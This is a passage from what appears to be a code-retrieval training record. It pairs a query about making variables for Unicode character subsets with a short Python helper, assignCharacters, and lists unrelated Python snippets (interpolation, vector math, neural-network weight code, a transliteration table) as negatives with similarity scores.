max(min(self.ySearchFunc(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(self.zSearchFunc(self.z_list, z), self.z_n - 1), 1)\n else:\n w_pos = self.wSearchFunc(self.w_list, w)\n w_pos[w_pos < 1] = 1\n w_pos[w_pos > self.w_n - 1] = self.w_n - 1\n x_pos = self.xSearchFunc(self.x_list, x)\n x_pos[x_pos < 1] = 1\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = self.ySearchFunc(self.y_list, y)\n y_pos[y_pos < 1] = 1\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n z_pos = self.zSearchFunc(self.z_list, z)\n z_pos[z_pos < 1] = 1\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n i = w_pos # for convenience\n j = x_pos\n k = y_pos\n l = z_pos\n beta = (x - self.x_list[j - 1]) / (self.x_list[j] - self.x_list[j - 1])\n gamma = (y - self.y_list[k - 1]) / (self.y_list[k] - self.y_list[k - 1])\n delta = (z - self.z_list[l - 1]) / (self.z_list[l] - self.z_list[l - 1])\n dfdw = (\n (\n (1 - beta)\n * (1 - gamma)\n * (1 - delta)\n * self.f_values[i, j - 1, k - 1, l - 1]\n + (1 - beta) * (1 - gamma) * delta * self.f_values[i, j - 1, k - 1, l]\n + (1 - beta) * gamma * (1 - delta) * self.f_values[i, j - 1, k, l - 1]\n + (1 - beta) * gamma * delta * self.f_values[i, j - 1, k, l]\n + beta * (1 - gamma) * (1 - delta) * self.f_values[i, j, k - 1, l - 1]\n + beta * (1 - gamma) * delta * self.f_values[i, j, k - 1, l]\n + beta * gamma * (1 - delta) * self.f_values[i, j, k, l - 1]\n + beta * gamma * delta * self.f_values[i, j, k, l]\n )\n - (\n (1 - beta)\n * (1 - gamma)\n * (1 - delta)\n * self.f_values[i - 1, j - 1, k - 1, l - 1]\n + (1 - beta)\n * (1 - gamma)\n * delta\n * self.f_values[i - 1, j - 1, k - 1, l]\n + (1 - beta)\n * gamma\n * (1 - delta)\n * self.f_values[i - 1, j - 1, k, l - 1]\n + (1 - beta) * gamma * delta * self.f_values[i - 1, j - 1, k, l]\n + beta\n * (1 - gamma)\n * (1 - delta)\n * self.f_values[i - 1, j, k - 1, l - 1]\n + beta * (1 - gamma) * delta * self.f_values[i - 1, j, k - 1, l]\n + beta * gamma * (1 - delta) * self.f_values[i - 1, j, k, l - 1]\n + beta * gamma * delta * self.f_values[i - 1, j, k, l]\n )\n ) / (self.w_list[i] - self.w_list[i - 1])\n return dfdw", "def subtract(v: Vector, w: Vector) -> Vector:\n assert len(v) == len(w), 'both vectors must have the same length'\n\n return [v_item - w_item for v_item, w_item in zip(v, w)]", "def u_update(eta_0, eta, eta_lin, w_0, w, w_lin, eta_T_H_L_stacked, premultiplied_lhs = None, nnls_max_iter=50): \n # PREMULTIPLIED LHS IS AN EXTRA ARGUMENT! Set it to None and add solver! \n \"\"\"In the following +[[]] and [:-1] are added to keep thing 1dim array of objects and still multiply it elemtwisely\"\"\" \n# #B.append([]) #THIS IS WRONG, CHANGES THE LIST \n# B_concat = np.concatenate((1/np.sqrt(2*eta))*np.array(B+[[]])[:-1], axis = 0) \n# A_ls = np.concatenate([(1/np.sqrt(2*eta0))*A, B_concat], axis = 0) \n# #print(np.array(B).shape) \n# #print(w[0].shape) \n# #print(w, eta) \n# #w.append([]) THIS IS WRONG, CHANGES THE LIST \n# w_concat = np.concatenate((1/np.sqrt(2*eta))*np.array(w+[[]])[:-1], axis = 0) #[:-1] Added as a hack to keep it one-dim array of objects \n# eta_w = np.expand_dims(1/np.sqrt(2*eta),1)*np.array(w) \n# print(eta_w.shape) \n# b_ls = np.concatenate([(1/np.sqrt(2*eta_0))*w_0, eta_w.flatten()], axis = 0) \n #Use correct broadcasting?\n w_concat = np.concatenate((1/np.sqrt(2*eta))*np.array(w+[[]])[:-1], axis = 0) #[:-1] Added as a hack to keep it one-dim array of objects \n b_ls = np.concatenate([(1/np.sqrt(2*eta_0))*w_0, w_concat, (1/np.sqrt(2*eta_lin))*w_lin], axis = 0) \n# print(np.sum(eta_w.flatten() != w_concat)) \n# premultiplied_time_start = time.time() \n# premultiplied_lhs = eta_T_H_stacked.T.dot(eta_T_H_stacked).toarray() \n# premultiplied_time_end = time.time() \n# print('premultiplying took {}'.format(premultiplied_time_end - premultiplied_time_start)) \n# premultiplied_rhs = eta_T_H_stacked.T.dot(b_ls) \n# u_next = nnls_predotted(premultiplied_lhs, premultiplied_rhs, tol=1e-5) \n# print(eta_T_H_stacked.shape, b_ls.shape) \n# A_ls_t_b = eta_T_H_stacked.T.dot(b_ls) \n# w =scipy.sparse.linalg.spsolve_triangular(RT, A_ls_t_b, lower = True) \n# x = scipy.sparse.linalg.spsolve_triangular(R, w, lower = False) \n# u_next = x \n u_next = scipy.optimize.lsq_linear(eta_T_H_L_stacked, b_ls, bounds = (0, np.inf), tol=1e-3, lsmr_tol=1e-3, max_iter=nnls_max_iter, verbose=1).x \n# u = scipy.optimize.lsq_linear(premultiplied_lhs, premultiplied_rhs, bounds = (0, np.inf), tol=1e-5).x \n return u_next", "def lca(self, v, w):", "def __add__(self, v):\n return vector(self.x + v.x, self.y + v.y, self.z + v.z)", "def squared_distance(v, w):\n return sum_of_squares(vector_subtract(v, w))", "def u_weights(self):\n for i in range(self.n_inputs):\n self._q_neuron.cx(self._weights[i], self.inputs[i])", "def resmlp(self, x, w3, w2, b2, w, b):\r\n return tf.matmul(tf.nn.tanh(tf.matmul(x, w2) + b2), w) + tf.matmul(x,\r\n w3) + b", "def squared_distance(v, w):\n return sum_of_squares(vector_subtraction(v, w))", "def _create_weight_update_ops(self):\n with tf.name_scope(\"Weight_Update_Operators\"):\n self.weight_vars_assign_ops = []\n for weight_matrix, grad in zip(self._train_vars, self.step_direction_variables):\n self.weight_vars_assign_ops.append(\n tf.assign_add(weight_matrix, self._step_on_line_plh * -grad / self.norm_of_gradient_var).op)", "def forward(self, w_value, x1_value, x2_value, b_value):\n self.inputs = [w_value, x1_value, x2_value, b_value]\n\n x_input = np.asarray([x1_value, x2_value]).T\n # return np.matmul(x_value, w_value) + b_value # [Note] Matmul Order\n return x_input.dot(w_value) + b_value # [Note] Matmul Order", "def _assemble_W(self):\n L = torch.tril(self.L, diagonal=-1) + torch.diag(torch.ones(self.dim))\n U = torch.triu(self.U, diagonal=1)\n W = self.P @ L @ (U + torch.diag(self.S))\n return W", "def objective(V, W, h):\n return np.linalg.norm(v - w @ h, ord = 'fro')", "def objective(self,w):\n diffs = self.get_y_times_diffs(self.get_split_weights(w))\n #print diffs, sigmoid(diffs)\n obj = -np.sum(np.log(sigmoid(diffs))) #negative, since minimising\n # regularisation\n obj += 0.5 * self.alpha * np.dot(w[:self.interp_index[0]], w[:self.interp_index[0]])\n return obj", "def _compute_gradients(self, v0, prob_h_v0, vk, prob_h_vk):\n outer_product0 = tf.matmul(tf.transpose(v0), prob_h_v0)\n outer_productk = tf.matmul(tf.transpose(vk), prob_h_vk)\n W_grad = tf.reduce_mean(outer_product0 - outer_productk, axis=0)\n a_grad = tf.reduce_mean(v0 - vk, axis=0)\n b_grad = tf.reduce_mean(prob_h_v0 - prob_h_vk, axis=0)\n return W_grad, a_grad, b_grad" ]
[ "0.70978653", "0.70766723", "0.70762354", "0.65042007", "0.6414303", "0.63884014", "0.63861686", "0.63567185", "0.63381374", "0.63309324", "0.6324586", "0.62767076", "0.6206558", "0.617885", "0.608573", "0.6083657", "0.6048553", "0.6001456", "0.5981003", "0.59767973", "0.5976543", "0.59530234", "0.5921166", "0.58645374", "0.5852599", "0.58505607", "0.5838608", "0.5834272", "0.5834272", "0.5834272", "0.58214307", "0.58200586", "0.5808356", "0.5805838", "0.57981956", "0.57900196", "0.5779251", "0.57718694", "0.57703424", "0.5768552", "0.5756273", "0.5729984", "0.56744534", "0.5667315", "0.5661385", "0.5660248", "0.5655894", "0.564382", "0.56416786", "0.56357795", "0.56338733", "0.5603762", "0.56012905", "0.55924743", "0.55881494", "0.5586469", "0.5581144", "0.5574224", "0.55485106", "0.55443454", "0.55413777", "0.5537324", "0.5533671", "0.5527606", "0.55178607", "0.55166304", "0.55093527", "0.55062443", "0.54979396", "0.5493674", "0.5487183", "0.5482378", "0.54817474", "0.54648054", "0.54441905", "0.54432404", "0.5433706", "0.5428752", "0.5425314", "0.54112196", "0.54100436", "0.5406896", "0.540455", "0.5398901", "0.5397609", "0.53954244", "0.5395007", "0.5393957", "0.5386058", "0.53727317", "0.5368272", "0.5366069", "0.53639495", "0.53476936", "0.5345559", "0.53453356" ]
0.6353202
12
makes variables for subsets of the unicode char sets
def assignCharacters(otherChars, where): if(isinstance(otherChars, list)): where.append(otherChars) if(isinstance(otherChars, str)): tmp = " ".join(otherChars).split() where.append(tmp)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _characters(self):\n self.characters = list(\n set([item for sublist in self.grid for item in sublist])\n )\n return self.characters", "def unique_characters(self):\n charset = set()\n for doc in self.docs.values():\n charset |= set(doc)\n\n return charset", "def make_unicode():\r\n for num in range(300, 320):\r\n yield unichr(num)", "def test_unicodeCombining(self):\n input = raw_unicode(\n r\"Ik ben gei\\u0308nteresseerd in de co\\u00F6rdinatie van mijn knie\\u00EBn, maar kan niet e\\u0301e\\u0301n \\u00E0 twee enqu\\u00EAtes vinden die recht doet aan mijn carri\\u00E8re op Cura\\u00E7ao\")\n output = input.split(\" \")\n output[8] = output[8][0:-1]\n for (itmO, itmV) in zip(output, tokenize_en(input)):\n self.assertEqual(itmO, itmV[0])\n self.assertTrue(input[itmV[1]:].startswith(itmO))", "def init_characters( self ):\n self.characters = {}\n for i in range( 0, 255+1 ):\n self.face.load_char( chr(i), FT_LOAD_RENDER | FT_LOAD_TARGET_MONO )\n glyphslot = self.face.glyph\n self.glyphs[i] = glyphslot # keep reference to the glyphslot\n self.characters[ i ] = GlyphDecoder.from_glyphslot( glyphslot ).bitmap", "def get_char_vocab(datasets, chars_lowercase=False):\n vocab_char = set()\n for dataset in datasets:\n for _, words, _ in dataset:\n for word in words:\n if chars_lowercase:\n word = word.lower()\n vocab_char.update(word)\n\n return vocab_char", "def __init__(self, encoding):\n self.trans = {}\n for char in u\"ÀÁÂẦẤẪẨẬÃĀĂẰẮẴẶẲȦǠẠḀȂĄǍẢ\":\n self.trans[char] = u\"A\"\n for char in u\"ȀǞ\":\n self.trans[char] = u\"Ä\"\n self.trans[u\"Ǻ\"] = u\"Å\"\n self.trans[u\"Ä\"] = u\"Ae\"\n self.trans[u\"Å\"] = u\"Aa\"\n for char in u\"àáâầấẫẩậãāăằắẵặẳȧǡạḁȃąǎảẚ\":\n self.trans[char] = u\"a\"\n for char in u\"ȁǟ\":\n self.trans[char] = u\"ä\"\n self.trans[u\"ǻ\"] = u\"å\"\n self.trans[u\"ä\"] = u\"ae\"\n self.trans[u\"å\"] = u\"aa\"\n for char in u\"ḂḄḆƁƂ\":\n self.trans[char] = u\"B\"\n for char in u\"ḃḅḇƀɓƃ\":\n self.trans[char] = u\"b\"\n for char in u\"ĆĈĊÇČƇ\":\n self.trans[char] = u\"C\"\n for char in u\"ćĉċçčƈȼ\":\n self.trans[char] = u\"c\"\n self.trans[u\"Ḉ\"] = u\"Ç\"\n self.trans[u\"ḉ\"] = u\"ç\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ĎḊḌḎḐḒĐƉƊƋ\":\n self.trans[char] = u\"D\"\n for char in u\"ďḋḍḏḑḓđɖɗƌ\":\n self.trans[char] = u\"d\"\n for char in u\"ÈȄÉÊḚËĒḔḖĔĖẸE̩ȆȨḜĘĚẼḘẺ\":\n self.trans[char] = u\"E\"\n for char in u\"ỀẾỄỆỂ\":\n self.trans[char] = u\"Ê\"\n for char in u\"èȅéêḛëēḕḗĕėẹe̩ȇȩḝęěẽḙẻ\":\n self.trans[char] = u\"e\"\n for char in u\"ềếễệể\":\n self.trans[char] = u\"ê\"\n for char in u\"ḞƑ\":\n self.trans[char] = u\"F\"\n for char in u\"ḟƒ\":\n self.trans[char] = u\"f\"\n for char in u\"ǴḠĞĠĢǦǤƓ\":\n self.trans[char] = u\"G\"\n for char in u\"ǵḡğġģǧǥɠ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ĝ\"] = u\"Gx\"\n self.trans[u\"ĝ\"] = u\"gx\"\n for char in u\"ḢḤḦȞḨḪH̱ĦǶ\":\n self.trans[char] = u\"H\"\n for char in u\"ḣḥḧȟḩḫ̱ẖħƕ\":\n self.trans[char] = u\"h\"\n for char in u\"IÌȈÍÎĨḬÏḮĪĬȊĮǏİỊỈƗ\":\n self.trans[char] = u\"I\"\n for char in u\"ıìȉíîĩḭïḯīĭȋįǐiịỉɨ\":\n self.trans[char] = u\"i\"\n for char in u\"ĴJ\":\n self.trans[char] = u\"J\"\n for char in u\"ɟĵ̌ǰ\":\n self.trans[char] = u\"j\"\n for char in u\"ḰǨĶḲḴƘ\":\n self.trans[char] = u\"K\"\n for char in u\"ḱǩķḳḵƙ\":\n self.trans[char] = u\"k\"\n for char in u\"ĹĻĽḶḸḺḼȽŁ\":\n self.trans[char] = u\"L\"\n for char in u\"ĺļľḷḹḻḽƚłɫ\":\n self.trans[char] = u\"l\"\n for char in u\"ḾṀṂ\":\n self.trans[char] = u\"M\"\n for char in u\"ḿṁṃɱ\":\n self.trans[char] = u\"m\"\n for char in u\"ǸŃÑŅŇṄṆṈṊŊƝɲȠ\":\n self.trans[char] = u\"N\"\n for char in u\"ǹńñņňṅṇṉṋŋɲƞ\":\n self.trans[char] = u\"n\"\n for char in u\"ÒÓÔÕṌṎȬÖŌṐṒŎǑȮȰỌǪǬƠỜỚỠỢỞỎƟØǾ\":\n self.trans[char] = u\"O\"\n for char in u\"òóôõṍṏȭöōṑṓŏǒȯȱọǫǭơờớỡợởỏɵøǿ\":\n self.trans[char] = u\"o\"\n for char in u\"ȌŐȪ\":\n self.trans[char] = u\"Ö\"\n for char in u\"ȍőȫ\":\n self.trans[char] = u\"ö\"\n for char in u\"ỒỐỖỘỔȎ\":\n self.trans[char] = u\"Ô\"\n for char in u\"ồốỗộổȏ\":\n self.trans[char] = u\"ô\"\n for char in u\"ṔṖƤ\":\n self.trans[char] = u\"P\"\n for char in u\"ṕṗƥ\":\n self.trans[char] = u\"p\"\n self.trans[u\"ᵽ\"] = u\"q\"\n for char in u\"ȐŔŖŘȒṘṚṜṞ\":\n self.trans[char] = u\"R\"\n for char in u\"ȑŕŗřȓṙṛṝṟɽ\":\n self.trans[char] = u\"r\"\n for char in u\"ŚṤŞȘŠṦṠṢṨ\":\n self.trans[char] = u\"S\"\n for char in u\"śṥşșšṧṡṣṩȿ\":\n self.trans[char] = u\"s\"\n self.trans[u\"Ŝ\"] = u\"Sx\"\n self.trans[u\"ŝ\"] = u\"sx\"\n for char in u\"ŢȚŤṪṬṮṰŦƬƮ\":\n self.trans[char] = u\"T\"\n for char in u\"ţțťṫṭṯṱŧȾƭʈ\":\n self.trans[char] = u\"t\"\n for char in u\"ÙÚŨṸṴÜṲŪṺŬỤŮŲǓṶỦƯỮỰỬ\":\n self.trans[char] = u\"U\"\n for char in u\"ùúũṹṵüṳūṻŭụůųǔṷủưữựửʉ\":\n self.trans[char] = u\"u\"\n for char in u\"ȔŰǛǗǕǙ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ȕűǜǘǖǚ\":\n self.trans[char] = u\"ü\"\n self.trans[u\"Û\"] = u\"Ux\"\n self.trans[u\"û\"] = u\"ux\"\n self.trans[u\"Ȗ\"] = u\"Û\"\n self.trans[u\"ȗ\"] = u\"û\"\n self.trans[u\"Ừ\"] = u\"Ù\"\n self.trans[u\"ừ\"] = u\"ù\"\n self.trans[u\"Ứ\"] = u\"Ú\"\n self.trans[u\"ứ\"] = u\"ú\"\n for char in u\"ṼṾ\":\n self.trans[char] = u\"V\"\n for char in u\"ṽṿ\":\n self.trans[char] = u\"v\"\n for char in u\"ẀẂŴẄẆẈ\":\n self.trans[char] = u\"W\"\n for char in u\"ẁẃŵẅẇẉ\":\n self.trans[char] = u\"w\"\n for char in u\"ẊẌ\":\n self.trans[char] = u\"X\"\n for char in u\"ẋẍ\":\n self.trans[char] = u\"x\"\n for char in u\"ỲÝŶŸỸȲẎỴỶƳ\":\n self.trans[char] = u\"Y\"\n for char in u\"ỳýŷÿỹȳẏỵỷƴ\":\n self.trans[char] = u\"y\"\n for char in u\"ŹẐŻẒŽẔƵȤ\":\n self.trans[char] = u\"Z\"\n for char in u\"źẑżẓžẕƶȥ\":\n self.trans[char] = u\"z\"\n self.trans[u\"ɀ\"] = u\"zv\"\n\n # Latin: extended Latin alphabet\n self.trans[u\"ɑ\"] = u\"a\"\n for char in u\"ÆǼǢ\":\n self.trans[char] = u\"AE\"\n for char in u\"æǽǣ\":\n self.trans[char] = u\"ae\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ƎƏƐ\":\n self.trans[char] = u\"E\"\n for char in u\"ǝəɛ\":\n self.trans[char] = u\"e\"\n for char in u\"ƔƢ\":\n self.trans[char] = u\"G\"\n for char in u\"ᵷɣƣᵹ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ƅ\"] = u\"H\"\n self.trans[u\"ƅ\"] = u\"h\"\n self.trans[u\"Ƕ\"] = u\"Wh\"\n self.trans[u\"ƕ\"] = u\"wh\"\n self.trans[u\"Ɩ\"] = u\"I\"\n self.trans[u\"ɩ\"] = u\"i\"\n self.trans[u\"Ŋ\"] = u\"Ng\"\n self.trans[u\"ŋ\"] = u\"ng\"\n self.trans[u\"Œ\"] = u\"OE\"\n self.trans[u\"œ\"] = u\"oe\"\n self.trans[u\"Ɔ\"] = u\"O\"\n self.trans[u\"ɔ\"] = u\"o\"\n self.trans[u\"Ȣ\"] = u\"Ou\"\n self.trans[u\"ȣ\"] = u\"ou\"\n self.trans[u\"Ƽ\"] = u\"Q\"\n for char in u\"ĸƽ\":\n self.trans[char] = u\"q\"\n self.trans[u\"ȹ\"] = u\"qp\"\n self.trans[u\"\"] = u\"r\"\n self.trans[u\"ſ\"] = u\"s\"\n self.trans[u\"ß\"] = u\"ss\"\n self.trans[u\"Ʃ\"] = u\"Sh\"\n for char in u\"ʃᶋ\":\n self.trans[char] = u\"sh\"\n self.trans[u\"Ʉ\"] = u\"U\"\n self.trans[u\"ʉ\"] = u\"u\"\n self.trans[u\"Ʌ\"] = u\"V\"\n self.trans[u\"ʌ\"] = u\"v\"\n for char in u\"ƜǷ\":\n self.trans[char] = u\"W\"\n for char in u\"ɯƿ\":\n self.trans[char] = u\"w\"\n self.trans[u\"Ȝ\"] = u\"Y\"\n self.trans[u\"ȝ\"] = u\"y\"\n self.trans[u\"IJ\"] = u\"IJ\"\n self.trans[u\"ij\"] = u\"ij\"\n self.trans[u\"Ƨ\"] = u\"Z\"\n for char in u\"ʮƨ\":\n self.trans[char] = u\"z\"\n self.trans[u\"Ʒ\"] = u\"Zh\"\n self.trans[u\"ʒ\"] = u\"zh\"\n self.trans[u\"Ǯ\"] = u\"Dzh\"\n self.trans[u\"ǯ\"] = u\"dzh\"\n for char in u\"ƸƹʔˀɁɂ\":\n self.trans[char] = u\"'\"\n self.trans['Þ'] = 'Th'\n self.trans['þ'] = 'th'\n for char in u\"Cʗǃ\":\n self.trans[char] = u\"!\"\n\n # Punctuation and typography\n for char in u\"«»“”„¨\":\n self.trans[char] = u'\"'\n for char in u\"‘’′\":\n self.trans[char] = u\"'\"\n self.trans[u\"•\"] = u\"*\"\n self.trans[u\"@\"] = u\"(at)\"\n self.trans[u\"¤\"] = u\"$\"\n self.trans[u\"¢\"] = u\"c\"\n self.trans[u\"€\"] = u\"E\"\n self.trans[u\"£\"] = u\"L\"\n self.trans[u\"¥\"] = u\"yen\"\n self.trans[u\"†\"] = u\"+\"\n self.trans[u\"‡\"] = u\"++\"\n self.trans[u\"°\"] = u\":\"\n self.trans[u\"¡\"] = u\"!\"\n self.trans[u\"¿\"] = u\"?\"\n self.trans[u\"‰\"] = u\"o/oo\"\n self.trans[u\"‱\"] = u\"o/ooo\"\n for char in u\"¶§\":\n self.trans[char] = u\">\"\n self.trans['…'] = '...'\n for char in u\"‒–—―\":\n self.trans[char] = u\"-\"\n self.trans['·'] = ' '\n self.trans[u\"¦\"] = u\"|\"\n self.trans[u\"⁂\"] = u\"***\"\n self.trans[u\"◊\"] = u\"<>\"\n self.trans[u\"‽\"] = u\"?!\"\n self.trans[u\"؟\"] = u\";-)\"\n self.trans[u\"¹\"] = u\"1\"\n self.trans[u\"²\"] = u\"2\"\n self.trans[u\"³\"] = u\"3\"\n\n # Cyrillic\n self.trans.update({u\"А\": u\"A\", u\"а\": u\"a\", u\"Б\": u\"B\", u\"б\": u\"b\",\n u\"В\": u\"V\", u\"в\": u\"v\", u\"Г\": u\"G\", u\"г\": u\"g\",\n u\"Д\": u\"D\", u\"д\": u\"d\", u\"Е\": u\"E\", u\"е\": u\"e\",\n u\"Ж\": u\"Zh\", u\"ж\": u\"zh\", u\"З\": u\"Z\", u\"з\": u\"z\",\n u\"И\": u\"I\", u\"и\": u\"i\", u\"Й\": u\"J\", u\"й\": u\"j\",\n u\"К\": u\"K\", u\"к\": u\"k\", u\"Л\": u\"L\", u\"л\": u\"l\",\n u\"М\": u\"M\", u\"м\": u\"m\", u\"Н\": u\"N\", u\"н\": u\"n\",\n u\"О\": u\"O\", u\"о\": u\"o\", u\"П\": u\"P\", u\"п\": u\"p\",\n u\"Р\": u\"R\", u\"р\": u\"r\", u\"С\": u\"S\", u\"с\": u\"s\",\n u\"Т\": u\"T\", u\"т\": u\"t\", u\"У\": u\"U\", u\"у\": u\"u\",\n u\"Ф\": u\"F\", u\"ф\": u\"f\", u\"х\": u\"kh\", u\"Ц\": u\"C\",\n u\"ц\": u\"c\", u\"Ч\": u\"Ch\", u\"ч\": u\"ch\", u\"Ш\": u\"Sh\",\n u\"ш\": u\"sh\", u\"Щ\": u\"Shch\", u\"щ\": u\"shch\", u\"Ь\": u\"'\",\n u\"ь\": \"'\", u\"Ъ\": u'\"', u\"ъ\": '\"', u\"Ю\": u\"Yu\",\n u\"ю\": u\"yu\", u\"Я\": u\"Ya\", u\"я\": u\"ya\", u\"Х\": u\"Kh\",\n u\"Χ\": u\"Kh\"})\n\n # Additional Cyrillic letters, most occuring in only one or a few languages\n self.trans.update({u\"Ы\": u\"Y\", u\"ы\": u\"y\", u\"Ё\": u\"Ë\", u\"ё\": u\"ë\",\n u\"Э\": u\"È\", u\"Ѐ\": u\"È\", u\"э\": u\"è\", u\"ѐ\": u\"è\",\n u\"І\": u\"I\", u\"і\": u\"i\", u\"Ї\": u\"Ji\", u\"ї\": u\"ji\",\n u\"Є\": u\"Je\", u\"є\": u\"je\", u\"Ґ\": u\"G\", u\"Ҝ\": u\"G\",\n u\"ґ\": u\"g\", u\"ҝ\": u\"g\", u\"Ђ\": u\"Dj\", u\"ђ\": u\"dj\",\n \"Љ\": \"Lj\", \"љ\": \"lj\",\n u\"Њ\": u\"Nj\", u\"њ\": u\"nj\", u\"Ћ\": u\"Cj\", u\"ћ\": u\"cj\",\n 'Җ': 'Zhj', 'Ѓ': 'Gj', 'ѓ': 'gj',\n u\"Ќ\": u\"Kj\", u\"ќ\": u\"kj\", u\"Ӣ\": u\"Ii\", u\"ӣ\": u\"ii\",\n \"Ҳ\": \"H\", \"ҳ\": \"h\",\n u\"Ҷ\": u\"Dz\", u\"ҷ\": u\"dz\", u\"Ө\": u\"Ô\", u\"Ӫ\": u\"Ô\",\n u\"ө\": u\"ô\", u\"ӫ\": u\"ô\", u\"Ү\": u\"Y\", u\"ү\": u\"y\", u\"Һ\": u\"H\",\n u\"һ\": u\"h\", u\"Ә\": u\"AE\", u\"Ӕ\": u\"AE\", u\"ә\": u\"ae\",\n 'Ӛ': 'Ë', 'Ӭ': 'Ë', 'ӛ': 'ë', 'ӭ': 'ë',\n 'җ': 'zhj', 'Ұ': 'U', 'ў': 'ù', 'Ў': 'Ù',\n u\"ѝ\": u\"ì\", u\"Ѝ\": u\"Ì\", u\"Ӑ\": u\"A\", u\"ă\": u\"a\", u\"Ӓ\": u\"Ä\",\n \"Ҽ\": \"Ts\", \"Ҿ\": \"Ts\", \"ҽ\": \"ts\", \"ҿ\": \"ts\",\n u\"Ҙ\": u\"Dh\", u\"ҙ\": u\"dh\", u\"Ӏ\": u\"\", u\"ӏ\": u\"\", u\"Ӆ\": u\"L\",\n u\"ӆ\": u\"l\", u\"Ӎ\": u\"M\", u\"ӎ\": u\"m\", u\"Ӧ\": u\"Ö\", u\"ӧ\": u\"ö\",\n u\"Ҩ\": u\"u\", u\"ҩ\": u\"u\", u\"Ҧ\": u\"Ph\", u\"ҧ\": u\"ph\", u\"Ҏ\": u\"R\",\n u\"ҏ\": u\"r\", u\"Ҫ\": u\"Th\", u\"ҫ\": u\"th\", u\"Ҭ\": u\"T\", u\"ҭ\": u\"t\",\n 'Ӯ': 'Û', 'ӯ': 'û', 'Ӹ': 'U', 'ұ': 'u',\n u\"ӹ\": u\"u\", u\"Ҵ\": u\"Tts\", u\"ҵ\": u\"tts\", u\"Ӵ\": u\"Ch\", u\"ӵ\": u\"ch\"})\n\n for char in u\"ЈӤҊ\":\n self.trans[char] = u\"J\"\n for char in u\"јӥҋ\":\n self.trans[char] = u\"j\"\n for char in u\"ЏӁӜҶ\":\n self.trans[char] = u\"Dzh\"\n for char in u\"џӂӝҷ\":\n self.trans[char] = u\"dzh\"\n for char in u\"ЅӞӠӋҸ\":\n self.trans[char] = u\"Dz\"\n for char in u\"ѕӟӡӌҹ\":\n self.trans[char] = u\"dz\"\n for char in u\"ҒӶҔ\":\n self.trans[char] = u\"G\"\n for char in u\"ғӷҕ\":\n self.trans[char] = u\"g\"\n for char in u\"ҚҞҠӃ\":\n self.trans[char] = u\"Q\"\n for char in u\"қҟҡӄ\":\n self.trans[char] = u\"q\"\n for char in u\"ҢҤӉӇ\":\n self.trans[char] = u\"Ng\"\n for char in u\"ңҥӊӈ\":\n self.trans[char] = u\"ng\"\n for char in u\"ӖѢҌ\":\n self.trans[char] = u\"E\"\n for char in u\"ӗѣҍ\":\n self.trans[char] = u\"e\"\n for char in u\"ӲӰҮ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ӳӱү\":\n self.trans[char] = u\"ü\"\n\n # Archaic Cyrillic letters\n self.trans.update({u\"Ѹ\": u\"Ou\", u\"ѹ\": u\"ou\", u\"Ѡ\": u\"O\", u\"Ѻ\": u\"O\", u\"ѡ\": u\"o\",\n u\"ѻ\": u\"o\", u\"Ѿ\": u\"Ot\", u\"ѿ\": u\"ot\", u\"Ѣ\": u\"E\", u\"ѣ\": u\"e\",\n u\"Ѥ\": u\"Ei\", u\"Ѧ\": u\"Ei\", u\"ѥ\": u\"ei\", u\"ѧ\": u\"ei\", u\"Ѫ\": u\"Ai\",\n u\"ѫ\": u\"ai\", u\"Ѯ\": u\"X\", u\"ѯ\": u\"x\", u\"Ѱ\": u\"Ps\", u\"ѱ\": u\"ps\",\n u\"Ѳ\": u\"Th\", u\"ѳ\": u\"th\", u\"Ѵ\": u\"Ü\", u\"Ѷ\": u\"Ü\", u\"ѵ\": u\"ü\"})\n\n # Hebrew alphabet\n for char in u\"אע\":\n self.trans[char] = u\"'\"\n self.trans[u\"ב\"] = u\"b\"\n self.trans[u\"ג\"] = u\"g\"\n self.trans[u\"ד\"] = u\"d\"\n self.trans[u\"ה\"] = u\"h\"\n self.trans[u\"ו\"] = u\"v\"\n self.trans[u\"ז\"] = u\"z\"\n self.trans[u\"ח\"] = u\"kh\"\n self.trans[u\"ט\"] = u\"t\"\n self.trans[u\"י\"] = u\"y\"\n for char in u\"ךכ\":\n self.trans[char] = u\"k\"\n self.trans[u\"ל\"] = u\"l\"\n for char in u\"םמ\":\n self.trans[char] = u\"m\"\n for char in u\"ןנ\":\n self.trans[char] = u\"n\"\n self.trans[u\"ס\"] = u\"s\"\n for char in u\"ףפ\":\n self.trans[char] = u\"ph\"\n for char in u\"ץצ\":\n self.trans[char] = u\"ts\"\n self.trans[u\"ק\"] = u\"q\"\n self.trans[u\"ר\"] = u\"r\"\n self.trans[u\"ש\"] = u\"sh\"\n self.trans[u\"ת\"] = u\"th\"\n\n # Arab alphabet\n for char in u\"اﺍﺎ\":\n self.trans[char] = u\"a\"\n for char in u\"بﺏﺐﺒﺑ\":\n self.trans[char] = u\"b\"\n for char in u\"تﺕﺖﺘﺗ\":\n self.trans[char] = u\"t\"\n for char in u\"ثﺙﺚﺜﺛ\":\n self.trans[char] = u\"th\"\n for char in u\"جﺝﺞﺠﺟ\":\n self.trans[char] = u\"g\"\n for char in u\"حﺡﺢﺤﺣ\":\n self.trans[char] = u\"h\"\n for char in u\"خﺥﺦﺨﺧ\":\n self.trans[char] = u\"kh\"\n for char in u\"دﺩﺪ\":\n self.trans[char] = u\"d\"\n for char in u\"ذﺫﺬ\":\n self.trans[char] = u\"dh\"\n for char in u\"رﺭﺮ\":\n self.trans[char] = u\"r\"\n for char in u\"زﺯﺰ\":\n self.trans[char] = u\"z\"\n for char in u\"سﺱﺲﺴﺳ\":\n self.trans[char] = u\"s\"\n for char in u\"شﺵﺶﺸﺷ\":\n self.trans[char] = u\"sh\"\n for char in u\"صﺹﺺﺼﺻ\":\n self.trans[char] = u\"s\"\n for char in u\"ضﺽﺾﻀﺿ\":\n self.trans[char] = u\"d\"\n for char in u\"طﻁﻂﻄﻃ\":\n self.trans[char] = u\"t\"\n for char in u\"ظﻅﻆﻈﻇ\":\n self.trans[char] = u\"z\"\n for char in 